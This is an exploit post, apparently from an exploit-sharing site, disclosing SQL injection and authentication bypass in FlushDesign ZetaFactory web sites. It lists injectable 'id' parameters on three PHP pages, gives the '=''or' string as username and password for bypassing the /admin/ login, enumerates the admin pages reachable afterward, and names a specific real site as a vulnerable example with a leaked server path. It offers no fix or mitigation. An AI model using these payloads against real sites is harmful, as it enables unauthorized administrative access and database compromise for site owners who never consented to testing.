facebook facebook twitter rss

FlushDesign ZetaFactory Italy SQL Injection and Authentication

Author: KingSkrupellos , Published: 08-10-2018
# Exploit Title : FlushDesign ZetaFactory Italy SQL Injection and Authentication Bypass Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 04/10/2018
# Vendor Homepage : flushdesign.it ~ zetafactory.com
# Tested On : Windows and Linux
# Category : WebApps
# Google Dork : N/A
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

#################################################################################################

# SQL Injection Exploit :

/news/readnews.php?id=[SQL Injection]

/productions/productionsview.php?id=[SQL Injection]

/artists/bands_view.php?id=[SQL Injection]

# Admin Login Bypass [ Authentication Bypass ] Exploit :

Admin Panel Login Path : /admin/

Admin Username : '=''or'

Admin Password : '=''or'

# Useable Admin Control Panel URL Links =>

/admin/home.php

/admin/banner.php
/admin/banner/thumbs/.....

/admin/bio.php
/admin/news.php

/admin/bands.php
/admin/bands/thumbs/....

/admin/news.php
/admin/works.php
/admin/audio.php
/admin/video.php
/admin/download.php
/admin/links.php
/admin/contacts.php
/admin/photos.php

#################################################################################################

# Example Vulnerable Site => dysfunctionproductions.com => [ Proof of Concept ] => archive.is/J86XL

# SQL Database Error =>

Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in
/web/htdocs/www.dysfunctionproductions.com/home/news/readnews.php on line 40

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

Like us on Facebook :